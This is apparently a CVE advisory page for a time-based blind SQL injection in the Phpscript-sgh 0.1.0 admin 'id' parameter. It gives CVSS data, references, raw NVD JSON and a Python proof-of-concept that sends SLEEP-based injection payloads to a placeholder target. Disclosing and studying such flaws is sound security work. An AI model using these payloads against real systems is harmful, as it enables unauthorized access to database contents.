CVE-2020-36951

Description

Phpscript-sgh 0.1.0 contains a time-based blind SQL injection vulnerability in the admin interface that allows attackers to manipulate database queries through the 'id' parameter. Attackers can exploit this vulnerability by crafting malicious payloads that trigger time delays, enabling them to extract sensitive database information through conditional sleep techniques.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Phpscript-sgh 0.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import time
import requests

# CVE-2020-36951 Time-based Blind SQL Injection PoC
# Target: Phpscript-sgh 0.1.0 admin interface

target_url = "http://target.com/admin/index.php"

def time_based_sqli_test(payload):
    """
    Test for time-based blind SQL injection
    Returns True if vulnerability exists (response delayed)
    """
    start_time = time.time()
    
    # Simulate request with SQL injection payload in 'id' parameter
    # Original request: id=1
    # Injected request: id=1 AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)
    
    params = {
        'id': payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        elapsed = time.time() - start_time
        
        # If response takes > 5 seconds, injection successful
        if elapsed > 5:
            return True
    except requests.exceptions.RequestException:
        pass
    
    return False

# Example payloads
payloads = [
    "1 AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--",
    "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--",
    "1' OR (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--"
]

# Test vulnerability
for payload in payloads:
    if time_based_sqli_test(payload):
        print(f"[+] Vulnerable! Payload: {payload}")
        break

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36951
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36951
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36951/
[4] VulDB https://vuldb.com/cve/CVE-2020-36951
[5] https://github.com/geraked/phpscript-sgh
[6] https://www.exploit-db.com/exploits/49192
[7] https://www.vulncheck.com/advisories/phpscript-sgh-time-based-blind-sql-injection

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36951", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:12.727", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Phpscript-sgh 0.1.0 contains a time-based blind SQL injection vulnerability in the admin interface that allows attackers to manipulate database queries through the 'id' parameter. Attackers can exploit this vulnerability by crafting malicious payloads that trigger time delays, enabling them to extract sensitive database information through conditional sleep techniques."}, {"lang": "es", "value": "Phpscript-sgh 0.1.0 contiene una vulnerabilidad de inyección SQL ciega basada en tiempo en la interfaz de administración que permite a los atacantes manipular consultas de base de datos a través del parámetro 'id'. Los atacantes pueden explotar esta vulnerabilidad creando cargas útiles maliciosas que desencadenan retrasos de tiempo, permitiéndoles extraer información sensible de la base de datos a través de técnicas de suspensión condicional."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/geraked/phpscript-sgh", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49192", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/phpscript-sgh-time-based-blind-sql-injection", "source": "[email protected]"}]}}